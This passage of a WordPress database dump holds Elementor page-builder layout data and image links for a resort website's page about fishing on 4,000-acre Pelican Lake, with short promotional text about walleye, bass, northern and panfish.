dgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb81b03\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7aa2fd3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e596e7c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b1b9de5\"}],\"content_width\":{\"unit\":\"px\",\"size\":1274,\"sizes\":[]}},\"elements\":[{\"id\":\"b77d62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b5efcf7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"92f19c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6947ee9\"}]},\"elements\":[{\"id\":\"4a4a9e2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2933.jpg\",\"id\":875}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"774d3f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8258c6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9aa1d2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"21f8b67\"}]},\"elements\":[{\"id\":\"1292ee5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/67664725_2541790915884778_4081940006199885824_n.jpg\",\"id\":912}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"37d43aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"78ff838\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f89e7a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38c4cb9\"}]},\"elements\":[{\"id\":\"6ea5dc9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/67354008_2515260805204456_2096376990331305984_n.jpg\",\"id\":911}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"288c56e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2fdbe18\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"984dd77\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7d5d219\"}]},\"elements\":[{\"id\":\"9ca33fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2905.jpg\",\"id\":873}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b3d678\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3442456\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"22ea8d6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"34881c4\"}]},\"elements\":[{\"id\":\"58b2643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b073176\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"26e79f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a64f106\"}]},\"elements\":[{\"id\":\"f687d69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pelican lake has wonderful walleye, bass, northern, crappie and sunfish.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2248,799,'_wp_page_template','default'),(2249,799,'_elementor_template_type','post'),(2250,799,'_elementor_version','2.5.13'),(2251,799,'_elementor_edit_mode','builder'),(2252,799,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2253,799,'_elementor_data','[{\"id\":\"817ef92\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c401d8f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2ff6c4b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"49298b4\"}]},\"elements\":[{\"id\":\"c96dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a80f0a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0dfcb72\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b411014\"}]},\"elements\":[{\"id\":\"49aeb2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>CATCH SOME MEMORIES<\\/strong><\\/p><p>Pelican Lake is a 4,000 acre lake with miles of interesting bays and coves to fish and explore. Pelican Lake is an excellent fishing lake for Northern, Walleye, Bass, and panfish.<\\/p><p><strong>JUST TAKE A LOOK<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"668445d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height\":{\"unit\":\"px\",\"size\":400,\"sizes\":[]},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"structure\":\"40\",\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e5f24f9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5ab0e47\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"430173f\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"shape_divider_top_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[{\"id\":\"e575265\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6ee7655\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61be359\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86050f1\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"de42909\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/20160522_070826.jpg\",\"id\":371},\"image_size\":\"medium_large\",\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",